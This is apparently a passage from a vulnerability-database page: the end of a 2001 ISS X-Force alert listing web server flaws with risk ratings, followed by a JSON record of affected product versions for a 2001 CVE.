Date Reported: 2/4/01 Vulnerability: hsweb-directory-browsing Platforms Affected: HSWeb Risk Factor: Low Attack Type: Network Based Brief Description: HSWeb Web Server allows attacker to browse directories X-Force URL: http://xforce.iss.net/static/6061.php


Date Reported: 2/4/01 Vulnerability: sedum-directory-traversal Platforms Affected: SEDUM Risk Factor: Medium Attack Type: Network Based Brief Description: SEDUM HTTP Server directory traversal X-Force URL: http://xforce.iss.net/static/6063.php


Date Reported: 2/4/01 Vulnerability: free-java-directory-traversal Platforms Affected: Free Java Risk Factor: Medium Attack Type: Network Based Brief Description: Free Java Web Server directory traversal X-Force URL: http://xforce.iss.net/static/6064.php


Date Reported: 2/2/01 Vulnerability: goahead-directory-traversal Platforms Affected: GoAhead Risk Factor: High Attack Type: Network Based Brief Description: GoAhead Web Server directory traversal X-Force URL: http://xforce.iss.net/static/6046.php


Date Reported: 2/2/01 Vulnerability: gnuserv-tcp-cookie-overflow Platforms Affected: Gnuserv Risk Factor: High Attack Type: Network/Host Based Brief Description: Gnuserv TCP enabled cookie buffer overflow X-Force URL: http://xforce.iss.net/static/6056.php


Date Reported: 2/2/01 Vulnerability: xmail-ctrlserver-bo Platforms Affected: Xmail CTRLServer Risk Factor: High Attack Type: Network Based Brief Description: XMail CTRLServer buffer overflow X-Force URL: http://xforce.iss.net/static/6060.php


Date Reported: 2/2/01 Vulnerability: netscape-webpublisher-acl-permissions Platforms Affected: Netscape Web Publisher Risk Factor: Medium Attack Type: Network Based Brief Description: Netcape Web Publisher poor ACL permissions X-Force URL: http://xforce.iss.net/static/6058.php


Date Reported: 2/1/01 Vulnerability: cups-httpgets-dos Platforms Affected: CUPS Risk Factor: High Attack Type: Host Based Brief Description: CUPS httpGets() function denial of service X-Force URL: http://xforce.iss.net/static/6043.php


Date Reported: 2/1/01 Vulnerability: prospero-get-pin Platforms Affected: Prospero Risk Factor: High Attack Type: Network/Host Based Brief Description: Prospero GET request reveals PIN information X-Force URL: http://xforce.iss.net/static/6044.php


Date Reported: 2/1/01 Vulnerability: prospero-weak-permissions Platforms Affected: Prospero Risk Factor: High Attack Type: Network/Host Based Brief Description: Prospero uses weak permissions X-Force URL: http://xforce.iss.net/static/6045.php


Risk Factor Key:

    High    Any vulnerability that provides an attacker with immediate
            access into a machine, gains superuser access, or bypasses
            a firewall.  Example:  A vulnerable Sendmail 8.6.5 version
            that allows an intruder to execute commands on mail
            server. 
    Medium  Any vulnerability that provides information that has a
            high potential of giving system access to an intruder. 
            Example: A misconfigured TFTP or vulnerable NIS server
            that allows an intruder to get the password file that
            could contain an account with a guessable password. 
    Low     Any vulnerability that provides information that
            potentially could lead to a compromise.  Example:  A
            finger that allows an intruder to find out who is online
            and potential accounts to attempt to crack passwords
            via brute force methods.

ISS is a leading global provider of security management solutions for e-business. By offering best-of-breed SAFEsuite(tm) security software, comprehensive ePatrol(tm) monitoring services and industry-leading expertise, ISS serves as its customers' trusted security provider protecting digital assets and ensuring the availability, confidentiality and integrity of computer systems and information critical to e-business success. ISS' security management solutions protect more than 5,000 customers including 21 of the 25 largest U.S. commercial banks, 9 of the 10 largest telecommunications companies and over 35 government agencies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe and Latin America. For more information, visit the ISS Web site at www.iss.net or call 800-776-2362.

Copyright (c) 2001 by Internet Security Systems, Inc.

Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission.

Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

X-Force PGP Key available at: http://xforce.iss.net/sensitive.php as well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc.

-----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv

iQCVAwUBOqb8ojRfJiV99eG9AQGEaAP+KH+SQYNBsbUcv/mUJNUz7dDPIYVcmPNV 1xyO/ctnG6qScWnlXGltYS7Rj8T8tYAAZC77oDhFSvvs8CX1Dr32ImEyvOIJhMLA h0wKCV3HOAYJ662BASe3jbO3nL/bumNKCRL5heuIU85pQOuH9xbqXkmFEimDmG2B tT+ylKw4hn4= =kfHg -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200105-0064",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": null,
        "scope": null,
        "trust": 3.2,
        "vendor": "ssh security",
        "version": null
      },
      {
        "model": "catalyst csx",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "cisco",
        "version": "60005.3"
      },
      {
        "model": null,
        "scope": null,
        "trust": 1.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 1.6,
        "vendor": "openssh",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.2.0"
      },
      {
        "model": "ios 12.1 ex",
        "scope": null,
        "trust": 1.2,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "cisco",
        "version": "60006.1"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "cisco",
        "version": "60005.5"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "core sdi",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "smoothwall",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "suse",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "holger lamm",
        "version": null
      },
      {
        "model": "ios 12.2xq",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xh",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xe",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xd",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xa",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2t",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "12.2"
      },
      {
        "model": "ios 12.1yf",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1yd",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1yc",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1yb",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xu",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xt",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xq",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xp",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xm",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xl",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xj",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xi",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xh",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xg",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xf",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xc",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xb",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1t",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ec",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1e",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0s",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "60006.2(0.110)"
      },
      {
        "model": "communications security ssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "1.2.31"
      },
      {
        "model": "communications security ssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "1.2.30"
      },
      {
        "model": "communications security ssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "1.2.29"
      },
      {
        "model": "communications security ssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "1.2.28"
      },
      {
        "model": "communications security ssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "1.2.27"
      },
      {
        "model": "communications security ssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "1.2.26"
      },
      {
        "model": "communications security ssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "1.2.25"
      },
      {
        "model": "communications security ssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "1.2.24"
      },
      {
        "model": "computing safeword agent for ssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "secure",
        "version": "1.0"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "2.2"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "2.1.1"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "2.1"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "1.2.3"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "1.2.2"
      },
      {
        "model": "screenos r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "3.1.1"
      },
      {
        "model": "screenos r9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "3.1"
      },
      {
        "model": "screenos r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "3.1"
      },
      {
        "model": "screenos r1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "3.1"
      },
      {
        "model": "screenos r1.1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "3.0.3"
      },
      {
        "model": "screenos r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "3.0.1"
      },
      {
        "model": "screenos r5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "2.6.1"
      },
      {
        "model": "screenos r4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "2.6.1"
      },
      {
        "model": "screenos r3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "2.6.1"
      },
      {
        "model": "screenos r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "2.6.1"
      },
      {
        "model": "screenos r1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "2.6.1"
      },
      {
        "model": "screenos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netscreen",
        "version": "2.6.1"
      },
      {
        "model": "pix firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.3(1)"
      },
      {
        "model": "pix firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(5)"
      },
      {
        "model": "ios 12.1ya",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.1xv"
      },
      {
        "model": "ios 12.1xs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ez",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ey",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ex",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1dc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1db",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.10s",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "communications security ssh2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "2.4"
      },
      {
        "model": "communications security ssh2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "2.3"
      },
      {
        "model": "communications security ssh2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "2.2"
      },
      {
        "model": "communications security ssh2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "2.1"
      },
      {
        "model": "communications security ssh2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ssh",
        "version": "2.0"
      },
      {
        "model": "openssh",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "2.3"
      },
      {
        "model": "webns b11s",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.0"
      },
      {
        "model": "webns 1b6s",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.0"
      },
      {
        "model": "webns 0b22s",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.1"
      },
      {
        "model": "webns 1b42s",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.0"
      },
      {
        "model": "pix firewall",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.0(1)"
      },
      {
        "model": "pix firewall",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.3(2)"
      },
      {
        "model": "pix firewall",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(6)"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.2(3)"
      },
      {
        "model": "ios 12.2 t",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 xa",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.2(1.1)"
      },
      {
        "model": "ios 12.2 xq",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 xh",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 xd1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 e",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 ec3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 ez1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 ey",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 yf2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 yd2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 yc1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 yb4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 xy6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.1(5)xv3"
      },
      {
        "model": "ios 12.1 xu1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 xr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 xg5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 xm4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 xt3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 xp4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0 s",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst pan",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60006.3"
      },
      {
        "model": "catalyst",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60006.2(0.111)"
      },
      {
        "model": "catalyst",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60006.1(2.13)"
      },
      {
        "model": "pix firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.2"
      },
      {
        "model": "pix firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.1"
      },
      {
        "model": "pix firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.0"
      },
      {
        "model": "pix firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.3"
      },
      {
        "model": "pix firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2"
      },
      {
        "model": "ios 12.2yh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ya",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xn",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2s",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2dd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2da",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2bc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2b",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1yi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ye",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.0xv"
      },
      {
        "model": "ios 12.0xm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0st",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0sp",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "css11000 content services switch",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60007.1(2)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60007.1"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60006.3(4)"
      },
      {
        "model": "catalyst pan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60006.3"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60006.2(0.111)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60006.1(2.13)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60006.1(1)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60005.5(4)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60005.5(3)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60005.5(2)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60005.5(13)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60005.5(1)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60005.4.1"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60005.4(4)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60005.4(3)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60005.4(2)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60005.4(1)"
      },
      {
        "model": "catalyst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60005.4"
      },
      {
        "model": "lamm pgp4pine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "holger",
        "version": "1.75.6"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#290140"
      },
      {
        "db": "CERT/CC",
        "id": "VU#13877"
      },
      {
        "db": "CERT/CC",
        "id": "VU#25309"
      },
      {
        "db": "CERT/CC",
        "id": "VU#945216"
      },
      {
        "db": "CERT/CC",
        "id": "VU#566640"
      },
      {
        "db": "CERT/CC",
        "id": "VU#315308"
      },
      {
        "db": "BID",
        "id": "2347"
      },
      {
        "db": "BID",
        "id": "5114"
      },
      {
        "db": "BID",
        "id": "2405"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0317"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-038"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
